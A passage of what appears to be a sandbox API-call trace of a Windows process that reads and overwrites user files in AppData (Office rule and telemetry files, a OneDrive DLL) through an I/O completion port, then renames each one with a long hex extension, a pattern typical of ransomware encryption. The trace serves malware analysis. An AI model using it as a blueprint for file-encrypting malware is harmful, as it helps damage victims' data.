lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.527] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0159.527] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.528] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.529] RtlInterlockedCompareExchange64 () returned 0x0 [0159.529] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.530] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0159.531] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml", lpString2=".2CFCDC1C71242AAE376E3C0A08C311ADB3965CB7408D7A6FCD7B30EE74EDA47F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml.2CFCDC1C71242AAE376E3C0A08C311ADB3965CB7408D7A6FCD7B30EE74EDA47F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml.2CFCDC1C71242AAE376E3C0A08C311ADB3965CB7408D7A6FCD7B30EE74EDA47F" [0159.531] GetProcessHeap () returned 0x270000 [0159.531] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x158) returned 0x35b038 [0159.531] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x35b038, Length=0x158, FileInformationClass=0xa) returned 0x0 [0159.536] CloseHandle (hObject=0x58c) returned 1 [0159.540] GetProcessHeap () returned 0x270000 [0159.541] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.541] RtlInterlockedCompareExchange64 () returned 0x1 [0159.541] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.544] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0159.544] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.545] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.550] RtlInterlockedCompareExchange64 () returned 0x0 [0159.550] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.551] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0159.552] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml", lpString2=".FCE8DE785B81FF77D7E4C424C494F4B90733850F61FCAD92A62B64F1F6B7907A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml.FCE8DE785B81FF77D7E4C424C494F4B90733850F61FCAD92A62B64F1F6B7907A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml.FCE8DE785B81FF77D7E4C424C494F4B90733850F61FCAD92A62B64F1F6B7907A" [0159.552] GetProcessHeap () returned 0x270000 [0159.552] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15a) returned 0x342050 [0159.553] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x342050, Length=0x15a, FileInformationClass=0xa) returned 0x0 [0159.554] CloseHandle (hObject=0x58c) returned 1 [0159.558] GetProcessHeap () returned 0x270000 [0159.560] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.560] RtlInterlockedCompareExchange64 () returned 0x1 [0159.560] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.600] ReadFile (in: hFile=0x590, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0159.600] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.601] WriteFile (in: hFile=0x590, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.603] RtlInterlockedCompareExchange64 () returned 0x0 [0159.603] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.604] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0159.605] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml", lpString2=".09C9FDD40F78A8542182D9528D88EDDF5DBE1EF686FDDA7BCB106EDA4C800230" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml.09C9FDD40F78A8542182D9528D88EDDF5DBE1EF686FDDA7BCB106EDA4C800230") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml.09C9FDD40F78A8542182D9528D88EDDF5DBE1EF686FDDA7BCB106EDA4C800230" [0159.605] GetProcessHeap () returned 0x270000 [0159.606] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x158) returned 0x35b1a0 [0159.606] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x35b1a0, Length=0x158, FileInformationClass=0xa) returned 0x0 [0159.607] CloseHandle (hObject=0x590) returned 1 [0159.614] GetProcessHeap () returned 0x270000 [0159.615] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.616] RtlInterlockedCompareExchange64 () returned 0x1 [0159.616] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.619] ReadFile (in: hFile=0x590, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0159.619] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.620] WriteFile (in: hFile=0x590, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.621] RtlInterlockedCompareExchange64 () returned 0x0 [0159.621] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.625] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0159.626] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat", lpString2=".FD17D5AF9954089E6931E45BF39371984C08D3ABF9662576CAB5EB11BB59600F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat.FD17D5AF9954089E6931E45BF39371984C08D3ABF9662576CAB5EB11BB59600F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat.FD17D5AF9954089E6931E45BF39371984C08D3ABF9662576CAB5EB11BB59600F" [0159.626] GetProcessHeap () returned 0x270000 [0159.626] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1da) returned 0x42f08b0 [0159.629] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x42f08b0, Length=0x1da, FileInformationClass=0xa) returned 0x0 [0159.631] CloseHandle (hObject=0x590) returned 1 [0159.634] GetProcessHeap () returned 0x270000 [0159.637] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.637] RtlInterlockedCompareExchange64 () returned 0x1 [0159.637] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.641] ReadFile (in: hFile=0x58c, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0159.641] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.643] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x7422118, ReturnLength=0x723f8ec) returned 0x0 [0159.644] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat", lpString2=".7A80E9DD773AC9B1CDB98DA617A80E62EF260B743B42F24409A47E8324462C71" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat.7A80E9DD773AC9B1CDB98DA617A80E62EF260B743B42F24409A47E8324462C71") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat.7A80E9DD773AC9B1CDB98DA617A80E62EF260B743B42F24409A47E8324462C71" [0159.644] GetProcessHeap () returned 0x270000 [0159.644] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1dc) returned 0x741a1d0 [0159.644] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x741a1d0, Length=0x1dc, FileInformationClass=0xa) returned 0x0 [0159.649] CloseHandle (hObject=0x58c) returned 1 [0159.653] GetProcessHeap () returned 0x270000 [0159.655] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.655] RtlInterlockedCompareExchange64 () returned 0x1 [0159.655] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.665] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0159.666] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.668] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0159.669] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat", lpString2=".FE323FBCC26329F7660D9946FEE30DC24C9BAD08AD2C1003F94F3AF4E0DDED09" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat.FE323FBCC26329F7660D9946FEE30DC24C9BAD08AD2C1003F94F3AF4E0DDED09") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat.FE323FBCC26329F7660D9946FEE30DC24C9BAD08AD2C1003F94F3AF4E0DDED09" [0159.669] GetProcessHeap () returned 0x270000 [0159.669] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1d6) returned 0x42f0a98 [0159.669] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x42f0a98, Length=0x1d6, FileInformationClass=0xa) returned 0x0 [0159.671] CloseHandle (hObject=0x58c) returned 1 [0159.674] GetProcessHeap () returned 0x270000 [0159.675] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.682] RtlInterlockedCompareExchange64 () returned 0x1 [0159.682] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.691] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0159.691] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.693] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0159.694] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat", lpString2=".A37F61B4DD4A14D713881A464EF5A841101EB4F9042828D20C6C773580AE7A5E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat.A37F61B4DD4A14D713881A464EF5A841101EB4F9042828D20C6C773580AE7A5E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat.A37F61B4DD4A14D713881A464EF5A841101EB4F9042828D20C6C773580AE7A5E" [0159.694] GetProcessHeap () returned 0x270000 [0159.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1da) returned 0x741a3b8 [0159.694] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x741a3b8, Length=0x1da, FileInformationClass=0xa) returned 0x0 [0159.696] CloseHandle (hObject=0x58c) returned 1 [0159.760] GetProcessHeap () returned 0x270000 [0159.762] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.762] RtlInterlockedCompareExchange64 () returned 0x1 [0159.762] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.768] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0159.770] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.776] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.779] RtlInterlockedCompareExchange64 () returned 0x0 [0159.779] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.781] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0159.782] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat", lpString2=".7D920B21389021953A1619A128B97E835ECA95CCC26D920C686DAAC0303F626C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat.7D920B21389021953A1619A128B97E835ECA95CCC26D920C686DAAC0303F626C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat.7D920B21389021953A1619A128B97E835ECA95CCC26D920C686DAAC0303F626C" [0159.782] GetProcessHeap () returned 0x270000 [0159.783] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1da) returned 0x741a5a0 [0159.783] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x741a5a0, Length=0x1da, FileInformationClass=0xa) returned 0x0 [0159.784] CloseHandle (hObject=0x58c) returned 1 [0159.787] GetProcessHeap () returned 0x270000 [0159.790] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.790] RtlInterlockedCompareExchange64 () returned 0x1 [0159.790] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.828] ReadFile (in: hFile=0x590, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0159.829] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.830] WriteFile (in: hFile=0x590, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0159.831] RtlInterlockedCompareExchange64 () returned 0x0 [0159.831] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.832] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x73e00f8, ReturnLength=0x723f8ec) returned 0x0 [0159.833] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncApi64.dll", lpString2=".ED843DE4B58279FD7A2BCF677CCC547DD541A236DE34493B0B15BCE456633834" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncApi64.dll.ED843DE4B58279FD7A2BCF677CCC547DD541A236DE34493B0B15BCE456633834") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncApi64.dll.ED843DE4B58279FD7A2BCF677CCC547DD541A236DE34493B0B15BCE456633834" [0159.833] GetProcessHeap () returned 0x270000 [0159.833] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x174) returned 0x427a6e0 [0159.833] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x427a6e0, Length=0x174, FileInformationClass=0xa) returned 0x0 [0159.835] CloseHandle (hObject=0x590) returned 1 [0159.847] GetProcessHeap () returned 0x270000 [0159.849] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0159.852] RtlInterlockedCompareExchange64 () returned 0x1 [0159.852] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.856] ReadFile (in: hFile=0x5ac, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0159.857] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.858] WriteFile (in: hFile=0x5ac, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0159.859] RtlInterlockedCompareExchange64 () returned 0x0 [0159.859] GetQueuedCompletionStatus (in: 